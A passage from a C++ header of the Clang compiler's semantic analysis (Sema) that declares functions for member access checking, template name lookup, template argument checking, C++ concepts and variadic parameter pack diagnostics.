bool SetMemberAccessSpecifier(NamedDecl *MemberDecl,
NamedDecl *PrevMemberDecl,
AccessSpecifier LexicalAS);
AccessResult CheckUnresolvedMemberAccess(UnresolvedMemberExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckUnresolvedLookupAccess(UnresolvedLookupExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckAllocationAccess(SourceLocation OperatorLoc,
SourceRange PlacementRange,
CXXRecordDecl *NamingClass,
DeclAccessPair FoundDecl,
bool Diagnose = true);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
bool IsCopyBindingRefToTemp = false);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
const PartialDiagnostic &PDiag);
AccessResult CheckDestructorAccess(SourceLocation Loc,
CXXDestructorDecl *Dtor,
const PartialDiagnostic &PDiag,
QualType objectType = QualType());
AccessResult CheckFriendAccess(NamedDecl *D);
AccessResult CheckMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *NamingClass,
DeclAccessPair Found);
AccessResult
CheckStructuredBindingMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *DecomposedClass,
DeclAccessPair Field);
AccessResult CheckMemberOperatorAccess(SourceLocation Loc,
Expr *ObjectExpr,
Expr *ArgExpr,
DeclAccessPair FoundDecl);
AccessResult CheckAddressOfMemberAccess(Expr *OvlExpr,
DeclAccessPair FoundDecl);
AccessResult CheckBaseClassAccess(SourceLocation AccessLoc,
QualType Base, QualType Derived,
const CXXBasePath &Path,
unsigned DiagID,
bool ForceCheck = false,
bool ForceUnprivileged = false);
void CheckLookupAccess(const LookupResult &R);
bool IsSimplyAccessible(NamedDecl *Decl, CXXRecordDecl *NamingClass,
QualType BaseType);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found, QualType ObjectType,
SourceLocation Loc,
const PartialDiagnostic &Diag);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found,
QualType ObjectType) {
return isMemberAccessibleForDeletion(NamingClass, Found, ObjectType,
SourceLocation(), PDiag());
}
void HandleDependentAccessCheck(const DependentDiagnostic &DD,
const MultiLevelTemplateArgumentList &TemplateArgs);
void PerformDependentDiagnostics(const DeclContext *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
void HandleDelayedAccessCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
/// When true, access checking violations are treated as SFINAE
/// failures rather than hard errors.
bool AccessCheckingSFINAE;
enum AbstractDiagSelID {
AbstractNone = -1,
AbstractReturnType,
AbstractParamType,
AbstractVariableType,
AbstractFieldType,
AbstractIvarType,
AbstractSynthesizedIvarType,
AbstractArrayType
};
bool isAbstractType(SourceLocation Loc, QualType T);
bool RequireNonAbstractType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
template <typename... Ts>
bool RequireNonAbstractType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireNonAbstractType(Loc, T, Diagnoser);
}
void DiagnoseAbstractType(const CXXRecordDecl *RD);
//===--------------------------------------------------------------------===//
// C++ Overloaded Operators [C++ 13.5]
//
bool CheckOverloadedOperatorDeclaration(FunctionDecl *FnDecl);
bool CheckLiteralOperatorDeclaration(FunctionDecl *FnDecl);
//===--------------------------------------------------------------------===//
// C++ Templates [C++ 14]
//
void FilterAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
bool hasAnyAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true,
bool AllowNonTemplateFunctions = false);
/// Try to interpret the lookup result D as a template-name.
///
/// \param D A declaration found by name lookup.
/// \param AllowFunctionTemplates Whether function templates should be
/// considered valid results.
/// \param AllowDependent Whether unresolved using declarations (that might
/// name templates) should be considered valid results.
NamedDecl *getAsTemplateNameDecl(NamedDecl *D,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
enum TemplateNameIsRequiredTag { TemplateNameIsRequired };
/// Whether and why a template name is required in this lookup.
class RequiredTemplateKind {
public:
/// Template name is required if TemplateKWLoc is valid.
RequiredTemplateKind(SourceLocation TemplateKWLoc = SourceLocation())
: TemplateKW(TemplateKWLoc) {}
/// Template name is unconditionally required.
RequiredTemplateKind(TemplateNameIsRequiredTag) : TemplateKW() {}
SourceLocation getTemplateKeywordLoc() const {
return TemplateKW.getValueOr(SourceLocation());
}
bool hasTemplateKeyword() const { return getTemplateKeywordLoc().isValid(); }
bool isRequired() const { return TemplateKW != SourceLocation(); }
explicit operator bool() const { return isRequired(); }
private:
llvm::Optional<SourceLocation> TemplateKW;
};
enum class AssumedTemplateKind {
/// This is not assumed to be a template name.
None,
/// This is assumed to be a template name because lookup found nothing.
FoundNothing,
/// This is assumed to be a template name because lookup found one or more
/// functions (but no function templates).
FoundFunctions,
};
bool LookupTemplateName(
LookupResult &R, Scope *S, CXXScopeSpec &SS, QualType ObjectType,
bool EnteringContext, bool &MemberOfUnknownSpecialization,
RequiredTemplateKind RequiredTemplate = SourceLocation(),
AssumedTemplateKind *ATK = nullptr, bool AllowTypoCorrection = true);
TemplateNameKind isTemplateName(Scope *S,
CXXScopeSpec &SS,
bool hasTemplateKeyword,
const UnqualifiedId &Name,
ParsedType ObjectType,
bool EnteringContext,
TemplateTy &Template,
bool &MemberOfUnknownSpecialization,
bool Disambiguation = false);
/// Try to resolve an undeclared template name as a type template.
///
/// Sets II to the identifier corresponding to the template name, and updates
/// Name to a corresponding (typo-corrected) type template name and TNK to
/// the corresponding kind, if possible.
void ActOnUndeclaredTypeTemplateName(Scope *S, TemplateTy &Name,
TemplateNameKind &TNK,
SourceLocation NameLoc,
IdentifierInfo *&II);
bool resolveAssumedTemplateNameAsType(Scope *S, TemplateName &Name,
SourceLocation NameLoc,
bool Diagnose = true);
/// Determine whether a particular identifier might be the name in a C++1z
/// deduction-guide declaration.
bool isDeductionGuideName(Scope *S, const IdentifierInfo &Name,
SourceLocation NameLoc,
ParsedTemplateTy *Template = nullptr);
bool DiagnoseUnknownTemplateName(const IdentifierInfo &II,
SourceLocation IILoc,
Scope *S,
const CXXScopeSpec *SS,
TemplateTy &SuggestedTemplate,
TemplateNameKind &SuggestedKind);
bool DiagnoseUninstantiableTemplate(SourceLocation PointOfInstantiation,
NamedDecl *Instantiation,
bool InstantiatedFromMember,
const NamedDecl *Pattern,
const NamedDecl *PatternDef,
TemplateSpecializationKind TSK,
bool Complain = true);
void DiagnoseTemplateParameterShadow(SourceLocation Loc, Decl *PrevDecl);
TemplateDecl *AdjustDeclIfTemplate(Decl *&Decl);
NamedDecl *ActOnTypeParameter(Scope *S, bool Typename,
SourceLocation EllipsisLoc,
SourceLocation KeyLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth, unsigned Position,
SourceLocation EqualLoc,
ParsedType DefaultArg, bool HasTypeConstraint);
bool ActOnTypeConstraint(const CXXScopeSpec &SS,
TemplateIdAnnotation *TypeConstraint,
TemplateTypeParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
bool AttachTypeConstraint(NestedNameSpecifierLoc NS,
DeclarationNameInfo NameInfo,
ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs,
TemplateTypeParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
bool AttachTypeConstraint(AutoTypeLoc TL,
NonTypeTemplateParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
QualType CheckNonTypeTemplateParameterType(TypeSourceInfo *&TSI,
SourceLocation Loc);
QualType CheckNonTypeTemplateParameterType(QualType T, SourceLocation Loc);
NamedDecl *ActOnNonTypeTemplateParameter(Scope *S, Declarator &D,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
Expr *DefaultArg);
NamedDecl *ActOnTemplateTemplateParameter(Scope *S,
SourceLocation TmpLoc,
TemplateParameterList *Params,
SourceLocation EllipsisLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
ParsedTemplateArgument DefaultArg);
TemplateParameterList *
ActOnTemplateParameterList(unsigned Depth,
SourceLocation ExportLoc,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> Params,
SourceLocation RAngleLoc,
Expr *RequiresClause);
/// The context in which we are checking a template parameter list.
enum TemplateParamListContext {
TPC_ClassTemplate,
TPC_VarTemplate,
TPC_FunctionTemplate,
TPC_ClassTemplateMember,
TPC_FriendClassTemplate,
TPC_FriendFunctionTemplate,
TPC_FriendFunctionTemplateDefinition,
TPC_TypeAliasTemplate
};
bool CheckTemplateParameterList(TemplateParameterList *NewParams,
TemplateParameterList *OldParams,
TemplateParamListContext TPC,
SkipBodyInfo *SkipBody = nullptr);
TemplateParameterList *MatchTemplateParametersToScopeSpecifier(
SourceLocation DeclStartLoc, SourceLocation DeclLoc,
const CXXScopeSpec &SS, TemplateIdAnnotation *TemplateId,
ArrayRef<TemplateParameterList *> ParamLists,
bool IsFriend, bool &IsMemberSpecialization, bool &Invalid,
bool SuppressDiagnostic = false);
DeclResult CheckClassTemplate(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name, SourceLocation NameLoc,
const ParsedAttributesView &Attr, TemplateParameterList *TemplateParams,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
SourceLocation FriendLoc, unsigned NumOuterTemplateParamLists,
TemplateParameterList **OuterTemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
TemplateArgumentLoc getTrivialTemplateArgumentLoc(const TemplateArgument &Arg,
QualType NTTPType,
SourceLocation Loc);
/// Get a template argument mapping the given template parameter to itself,
/// e.g. for X in \c template<int X>, this would return an expression template
/// argument referencing X.
TemplateArgumentLoc getIdentityTemplateArgumentLoc(NamedDecl *Param,
SourceLocation Location);
void translateTemplateArguments(const ASTTemplateArgsPtr &In,
TemplateArgumentListInfo &Out);
ParsedTemplateArgument ActOnTemplateTypeArgument(TypeResult ParsedType);
void NoteAllFoundTemplates(TemplateName Name);
QualType CheckTemplateIdType(TemplateName Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs);
TypeResult
ActOnTemplateIdType(Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
TemplateTy Template, IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc, SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs, SourceLocation RAngleLoc,
bool IsCtorOrDtorName = false, bool IsClassName = false);
/// Parsed an elaborated-type-specifier that refers to a template-id,
/// such as \c class T::template apply<U>.
TypeResult ActOnTagTemplateIdType(TagUseKind TUK,
TypeSpecifierType TagSpec,
SourceLocation TagLoc,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateD,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgsIn,
SourceLocation RAngleLoc);
DeclResult ActOnVarTemplateSpecialization(
Scope *S, Declarator &D, TypeSourceInfo *DI,
SourceLocation TemplateKWLoc, TemplateParameterList *TemplateParams,
StorageClass SC, bool IsPartialSpecialization);
DeclResult CheckVarTemplateId(VarTemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation TemplateNameLoc,
const TemplateArgumentListInfo &TemplateArgs);
ExprResult CheckVarTemplateId(const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
VarTemplateDecl *Template,
SourceLocation TemplateLoc,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult
CheckConceptTemplateId(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &ConceptNameInfo,
NamedDecl *FoundDecl, ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs);
void diagnoseMissingTemplateArguments(TemplateName Name, SourceLocation Loc);
ExprResult BuildTemplateIdExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
bool RequiresADL,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildQualifiedTemplateIdExpr(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
TemplateNameKind ActOnTemplateName(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
const UnqualifiedId &Name, ParsedType ObjectType, bool EnteringContext,
TemplateTy &Template, bool AllowInjectedClassName = false);
DeclResult ActOnClassTemplateSpecialization(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
SourceLocation ModulePrivateLoc, CXXScopeSpec &SS,
TemplateIdAnnotation &TemplateId, const ParsedAttributesView &Attr,
MultiTemplateParamsArg TemplateParameterLists,
SkipBodyInfo *SkipBody = nullptr);
bool CheckTemplatePartialSpecializationArgs(SourceLocation Loc,
TemplateDecl *PrimaryTemplate,
unsigned NumExplicitArgs,
ArrayRef<TemplateArgument> Args);
void CheckTemplatePartialSpecialization(
ClassTemplatePartialSpecializationDecl *Partial);
void CheckTemplatePartialSpecialization(
VarTemplatePartialSpecializationDecl *Partial);
Decl *ActOnTemplateDeclarator(Scope *S,
MultiTemplateParamsArg TemplateParameterLists,
Declarator &D);
bool
CheckSpecializationInstantiationRedecl(SourceLocation NewLoc,
TemplateSpecializationKind NewTSK,
NamedDecl *PrevDecl,
TemplateSpecializationKind PrevTSK,
SourceLocation PrevPtOfInstantiation,
bool &SuppressNew);
bool CheckDependentFunctionTemplateSpecialization(FunctionDecl *FD,
const TemplateArgumentListInfo &ExplicitTemplateArgs,
LookupResult &Previous);
bool CheckFunctionTemplateSpecialization(
FunctionDecl *FD, TemplateArgumentListInfo *ExplicitTemplateArgs,
LookupResult &Previous, bool QualifiedFriend = false);
bool CheckMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
void CompleteMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
DeclResult ActOnExplicitInstantiation(
Scope *S, SourceLocation ExternLoc, SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc, const CXXScopeSpec &SS,
TemplateTy Template, SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc, ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc, const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S, SourceLocation ExternLoc,
SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S,
SourceLocation ExternLoc,
SourceLocation TemplateLoc,
Declarator &D);
TemplateArgumentLoc
SubstDefaultTemplateArgumentIfAvailable(TemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
Decl *Param,
SmallVectorImpl<TemplateArgument>
&Converted,
bool &HasDefaultArg);
/// Specifies the context in which a particular template
/// argument is being checked.
enum CheckTemplateArgumentKind {
/// The template argument was specified in the code or was
/// instantiated with some deduced template arguments.
CTAK_Specified,
/// The template argument was deduced via template argument
/// deduction.
CTAK_Deduced,
/// The template argument was deduced from an array bound
/// via template argument deduction.
CTAK_DeducedFromArrayBound
};
bool CheckTemplateArgument(NamedDecl *Param,
TemplateArgumentLoc &Arg,
NamedDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
unsigned ArgumentPackIndex,
SmallVectorImpl<TemplateArgument> &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
/// Check that the given template arguments can be be provided to
/// the given template, converting the arguments along the way.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateLoc The location of the template name in the source.
///
/// \param TemplateArgs The list of template arguments. If the template is
/// a template template parameter, this function may extend the set of
/// template arguments to also include substituted, defaulted template
/// arguments.
///
/// \param PartialTemplateArgs True if the list of template arguments is
/// intentionally partial, e.g., because we're checking just the initial
/// set of template arguments.
///
/// \param Converted Will receive the converted, canonicalized template
/// arguments.
///
/// \param UpdateArgsWithConversions If \c true, update \p TemplateArgs to
/// contain the converted forms of the template arguments as written.
/// Otherwise, \p TemplateArgs will not be modified.
///
/// \param ConstraintsNotSatisfied If provided, and an error occured, will
/// receive true if the cause for the error is the associated constraints of
/// the template not being satisfied by the template arguments.
///
/// \returns true if an error occurred, false otherwise.
bool CheckTemplateArgumentList(TemplateDecl *Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs,
bool PartialTemplateArgs,
SmallVectorImpl<TemplateArgument> &Converted,
bool UpdateArgsWithConversions = true,
bool *ConstraintsNotSatisfied = nullptr);
bool CheckTemplateTypeArgument(TemplateTypeParmDecl *Param,
TemplateArgumentLoc &Arg,
SmallVectorImpl<TemplateArgument> &Converted);
bool CheckTemplateArgument(TemplateTypeParmDecl *Param,
TypeSourceInfo *Arg);
ExprResult CheckTemplateArgument(NonTypeTemplateParmDecl *Param,
QualType InstantiatedParamType, Expr *Arg,
TemplateArgument &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
bool CheckTemplateTemplateArgument(TemplateTemplateParmDecl *Param,
TemplateParameterList *Params,
TemplateArgumentLoc &Arg);
ExprResult
BuildExpressionFromDeclTemplateArgument(const TemplateArgument &Arg,
QualType ParamType,
SourceLocation Loc);
ExprResult
BuildExpressionFromIntegralTemplateArgument(const TemplateArgument &Arg,
SourceLocation Loc);
/// Enumeration describing how template parameter lists are compared
/// for equality.
enum TemplateParameterListEqualKind {
/// We are matching the template parameter lists of two templates
/// that might be redeclarations.
///
/// \code
/// template<typename T> struct X;
/// template<typename T> struct X;
/// \endcode
TPL_TemplateMatch,
/// We are matching the template parameter lists of two template
/// template parameters as part of matching the template parameter lists
/// of two templates that might be redeclarations.
///
/// \code
/// template<template<int I> class TT> struct X;
/// template<template<int Value> class Other> struct X;
/// \endcode
TPL_TemplateTemplateParmMatch,
/// We are matching the template parameter lists of a template
/// template argument against the template parameter lists of a template
/// template parameter.
///
/// \code
/// template<template<int Value> class Metafun> struct X;
/// template<int Value> struct integer_c;
/// X<integer_c> xic;
/// \endcode
TPL_TemplateTemplateArgumentMatch
};
bool TemplateParameterListsAreEqual(TemplateParameterList *New,
TemplateParameterList *Old,
bool Complain,
TemplateParameterListEqualKind Kind,
SourceLocation TemplateArgLoc
= SourceLocation());
bool CheckTemplateDeclScope(Scope *S, TemplateParameterList *TemplateParams);
/// Called when the parser has parsed a C++ typename
/// specifier, e.g., "typename T::type".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param II the identifier we're retrieving (e.g., 'type' in the example).
/// \param IdLoc the location of the identifier.
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS, const IdentifierInfo &II,
SourceLocation IdLoc);
/// Called when the parser has parsed a C++ typename
/// specifier that ends in a template-id, e.g.,
/// "typename MetaFun::template apply<T1, T2>".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param TemplateLoc the location of the 'template' keyword, if any.
/// \param TemplateName The template name.
/// \param TemplateII The identifier used to name the template.
/// \param TemplateIILoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateLoc,
TemplateTy TemplateName,
IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc,
TypeSourceInfo **TSI,
bool DeducedTSTContext);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc,
bool DeducedTSTContext = true);
TypeSourceInfo *RebuildTypeInCurrentInstantiation(TypeSourceInfo *T,
SourceLocation Loc,
DeclarationName Name);
bool RebuildNestedNameSpecifierInCurrentInstantiation(CXXScopeSpec &SS);
ExprResult RebuildExprInCurrentInstantiation(Expr *E);
bool RebuildTemplateParamsInCurrentInstantiation(
TemplateParameterList *Params);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgumentList &Args);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgument *Args,
unsigned NumArgs);
//===--------------------------------------------------------------------===//
// C++ Concepts
//===--------------------------------------------------------------------===//
Decl *ActOnConceptDefinition(
Scope *S, MultiTemplateParamsArg TemplateParameterLists,
IdentifierInfo *Name, SourceLocation NameLoc, Expr *ConstraintExpr);
RequiresExprBodyDecl *
ActOnStartRequiresExpr(SourceLocation RequiresKWLoc,
ArrayRef<ParmVarDecl *> LocalParameters,
Scope *BodyScope);
void ActOnFinishRequiresExpr();
concepts::Requirement *ActOnSimpleRequirement(Expr *E);
concepts::Requirement *ActOnTypeRequirement(
SourceLocation TypenameKWLoc, CXXScopeSpec &SS, SourceLocation NameLoc,
IdentifierInfo *TypeName, TemplateIdAnnotation *TemplateId);
concepts::Requirement *ActOnCompoundRequirement(Expr *E,
SourceLocation NoexceptLoc);
concepts::Requirement *
ActOnCompoundRequirement(
Expr *E, SourceLocation NoexceptLoc, CXXScopeSpec &SS,
TemplateIdAnnotation *TypeConstraint, unsigned Depth);
concepts::Requirement *ActOnNestedRequirement(Expr *Constraint);
concepts::ExprRequirement *
BuildExprRequirement(
Expr *E, bool IsSatisfied, SourceLocation NoexceptLoc,
concepts::ExprRequirement::ReturnTypeRequirement ReturnTypeRequirement);
concepts::ExprRequirement *
BuildExprRequirement(
concepts::Requirement::SubstitutionDiagnostic *ExprSubstDiag,
bool IsSatisfied, SourceLocation NoexceptLoc,
concepts::ExprRequirement::ReturnTypeRequirement ReturnTypeRequirement);
concepts::TypeRequirement *BuildTypeRequirement(TypeSourceInfo *Type);
concepts::TypeRequirement *
BuildTypeRequirement(
concepts::Requirement::SubstitutionDiagnostic *SubstDiag);
concepts::NestedRequirement *BuildNestedRequirement(Expr *E);
concepts::NestedRequirement *
BuildNestedRequirement(
concepts::Requirement::SubstitutionDiagnostic *SubstDiag);
ExprResult ActOnRequiresExpr(SourceLocation RequiresKWLoc,
RequiresExprBodyDecl *Body,
ArrayRef<ParmVarDecl *> LocalParameters,
ArrayRef<concepts::Requirement *> Requirements,
SourceLocation ClosingBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Variadic Templates (C++0x [temp.variadic])
//===--------------------------------------------------------------------===//
/// Determine whether an unexpanded parameter pack might be permitted in this
/// location. Useful for error recovery.
bool isUnexpandedParameterPackPermitted();
/// The context in which an unexpanded parameter pack is
/// being diagnosed.
///
/// Note that the values of this enumeration line up with the first
/// argument to the \c err_unexpanded_parameter_pack diagnostic.
enum UnexpandedParameterPackContext {
/// An arbitrary expression.
UPPC_Expression = 0,
/// The base type of a class type.
UPPC_BaseType,
/// The type of an arbitrary declaration.
UPPC_DeclarationType,
/// The type of a data member.
UPPC_DataMemberType,
/// The size of a bit-field.
UPPC_BitFieldWidth,
/// The expression in a static assertion.
UPPC_StaticAssertExpression,
/// The fixed underlying type of an enumeration.
UPPC_FixedUnderlyingType,
/// The enumerator value.
UPPC_EnumeratorValue,
/// A using declaration.
UPPC_UsingDeclaration,
/// A friend declaration.
UPPC_FriendDeclaration,
/// A declaration qualifier.
UPPC_DeclarationQualifier,
/// An initializer.
UPPC_Initializer,
/// A default argument.
UPPC_DefaultArgument,
/// The type of a non-type template parameter.
UPPC_NonTypeTemplateParameterType,
/// The type of an exception.
UPPC_ExceptionType,
/// Partial specialization.
UPPC_PartialSpecialization,
/// Microsoft __if_exists.
UPPC_IfExists,
/// Microsoft __if_not_exists.
UPPC_IfNotExists,
/// Lambda expression.
UPPC_Lambda,
/// Block expression,
UPPC_Block,
/// A type constraint,
UPPC_TypeConstraint
};
/// Diagnose unexpanded parameter packs.
///
/// \param Loc The location at which we should emit the diagnostic.
///
/// \param UPPC The context in which we are diagnosing unexpanded
/// parameter packs.
///
/// \param Unexpanded the set of unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPacks(SourceLocation Loc,
UnexpandedParameterPackContext UPPC,
ArrayRef<UnexpandedParameterPack> Unexpanded);
/// If the given type contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The source location where a diagnostc should be emitted.
///
/// \param T The type that is being checked for unexpanded parameter
/// packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc, TypeSourceInfo *T,
UnexpandedParameterPackContext UPPC);
/// If the given expression contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param E The expression that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(Expr *E,
UnexpandedParameterPackContext UPPC = UPPC_Expression);
/// If the given nested-name-specifier contains an unexpanded
/// parameter pack, diagnose the error.
///
/// \param SS The nested-name-specifier that is being checked for
/// unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const CXXScopeSpec &SS,
UnexpandedParameterPackContext UPPC);
/// If the given name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param NameInfo The name (with source location information) that
/// is being checked for unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const DeclarationNameInfo &NameInfo,
UnexpandedParameterPackContext UPPC);
/// If the given template name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The location of the template name.
///
/// \param Template The template name that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc,
TemplateName Template,
UnexpandedParameterPackContext UPPC);
/// If the given template argument contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param Arg The template argument that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(TemplateArgumentLoc Arg,
UnexpandedParameterPackContext UPPC);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgument Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgumentLoc Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param T The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(QualType T,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param TL The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TypeLoc TL,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// nested-name-specifier.
///
/// \param NNS The nested-name-specifier that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(NestedNameSpecifierLoc NNS,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// name.
///
/// \param NameInfo The name that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(const DeclarationNameInfo &NameInfo,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Invoked when parsing a template argument followed by an
/// ellipsis, which creates a pack expansion.
///
/// \param Arg The template argument preceding the ellipsis, which
/// may already be invalid.
///
/// \param EllipsisLoc The location of the ellipsis.
ParsedTemplateArgument ActOnPackExpansion(const ParsedTemplateArgument &Arg,
SourceLocation EllipsisLoc);
/// Invoked when parsing a type followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Type The type preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
TypeResult ActOnPackExpansion(ParsedType Type, SourceLocation EllipsisLoc);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
TypeSourceInfo *CheckPackExpansion(TypeSourceInfo *Pattern,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
QualType CheckPackExpansion(QualType Pattern,
SourceRange PatternRange,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult ActOnPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
